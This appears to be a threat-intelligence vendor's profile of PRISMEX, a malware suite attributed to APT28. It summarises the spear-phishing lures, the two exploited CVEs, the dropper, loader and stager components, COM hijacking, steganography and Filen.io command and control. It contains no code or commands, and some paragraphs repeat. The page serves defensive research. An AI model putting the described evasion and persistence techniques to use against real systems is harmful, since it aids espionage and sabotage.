PRISMEX
PRISMEX is a malware suite attributed with high confidence by Trend Micro to the Russia-linked APT28 threat group, also known as Fancy Bear and Pawn Storm. The campaign using PRISMEX has been active since at least September 2025 and intensified in January 2026. It targets Ukraine’s defense supply chain and allied organizations, including government, military, defense, aid, logistics, and other critical support entities in Central and Eastern Europe, with reported targeting including Ukraine, the Czech Republic, Poland, Romania, Slovakia, Slovenia, and Turkey.
The malware is used in spear-phishing operations themed around military training, aid, weather alerts, weapon smuggling, and related logistics. Reported lures include malicious RTF attachments and decoy documents resembling Ukrainian drone inventories, supplier price lists, and military logistics forms. The infection chain reportedly exploited CVE-2026-21509 and CVE-2026-21513 for initial access and silent payload execution.
PRISMEX is described as a multi-component toolkit including a dropper, loader, and implant/stager, with component names reported as PrismexDrop, PrismexLoader, PrismexStager, and PrismexSheet. Its capabilities include stealthy, fileless execution, persistence, encrypted command-and-control, espionage, and sabotage. Trend Micro reported that PRISMEX combines advanced steganography, COM hijacking, and abuse of legitimate cloud services for command and control. PrismexDrop reportedly decrypts payloads, drops files, and establishes persistence via COM hijacking and a scheduled task that restarts explorer.exe. PrismexLoader reportedly acts as a proxy DLL, mimics legitimate system behavior, and uses a custom steganography method called Bit Plane Round Robin to extract hidden payloads from images, then executes them in memory via .NET runtime loading. PrismexStager is described as a heavily obfuscated Covenant-based .NET Grunt stager used for command-and-control and task execution.
For command-and-control, PRISMEX reportedly abuses legitimate cloud services, specifically Filen.io, to blend encrypted traffic with normal activity. The malware suite is explicitly described as supporting both espionage and sabotage, including wiper commands. Reporting also states that researchers believe PRISMEX represents an evolution of the NotDoor ecosystem. High-confidence indicators and artifacts mentioned in the reporting include use of Filen.io for C2, WebDAV infrastructure in the exploit chain, COM hijacking for persistence, scheduled-task-based explorer.exe restart behavior, malicious LNK execution, and image-based steganographic payload concealment.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Prismex leverages multiple Windows vulnerabilities, Trend Micro said in its late March blog post, including "a confirmed Windows zero-day" in CVE-2026-21513 as well as Microsoft Office bug CVE-2026-21509. | Trend Micro said the actor ... has been using a collection of malware components known as "Prismex" to target the defense supply-chain of Ukraine and its allies ... "Prismex combines advanced steganography, component object model (COM) hijacking, and legitimate cloud service abuse for command and control," ... The special malware includes both espionage and sabotage capabilities, with the latter including wiper commands.
Trend Micro said the actor ... has been using a collection of malware components known as "Prismex" to target the defense supply-chain of Ukraine and its allies ... "Prismex combines advanced steganography, component object model (COM) hijacking, and legitimate cloud service abuse for command and control," ... The special malware includes both espionage and sabotage capabilities, with the latter including wiper commands. | Prismex leverages multiple Windows vulnerabilities, Trend Micro said in its late March blog post, including "a confirmed Windows zero-day" in CVE-2026-21513 as well as Microsoft Office bug CVE-2026-21509.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Trend Micro said the actor ... has been using a collection of malware components known as "Prismex" to target the defense supply-chain of Ukraine and its allies ... "Prismex combines advanced steganography, component object model (COM) hijacking, and legitimate cloud service abuse for command and control," ... The special malware includes both espionage and sabotage capabilities, with the latter including wiper commands.
Trend Micro said the actor ... has been using a collection of malware components known as "Prismex" to target the defense supply-chain of Ukraine and its allies ... "Prismex combines advanced steganography, component object model (COM) hijacking, and legitimate cloud service abuse for command and control," ... The special malware includes both espionage and sabotage capabilities, with the latter including wiper commands.
Techniques & procedures
10 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 technique
Initial Access
Execution
2 techniques
Execution
Persistence
1 technique
Persistence
Privilege Escalation
2 techniques
Privilege Escalation
Stealth
1 technique
Stealth
Command and Control
2 techniques
Command and Control
The final component, PrismexStager, connects to command-and-control servers via Filen.io cloud services. This helps attackers blend malicious traffic with normal encrypted communications, making detection harder while enabling data exfiltration and remote control.
Exfiltration
1 technique
Exfiltration
Victims who open the attached RTF file trigger exploitation of CVE-2026-21509, which bypasses security controls and forces the system to connect to an attacker-controlled WebDAV server. This automatically retrieves and executes a malicious LNK file without further user interaction.
Recent activity
3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A malware suite used in a spear-phishing campaign attributed to APT28. It includes a dropper, loader, and Covenant-based implant, supports fileless attacks, and uses encrypted command-and-control communications via cloud services such as Filen.io for espionage and persistent access.
A malware framework/component set used by APT28/Pawn Storm for espionage and sabotage. It uses steganography, COM hijacking, and legitimate cloud services for C2, and includes wiper functionality.
A modular malware suite used for espionage and command-and-control. It includes components for payload decryption and persistence, in-memory loading, steganographic payload extraction, COM hijacking, abuse of Filen.io for encrypted C2, and fileless execution to maintain stealthy long-term access.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.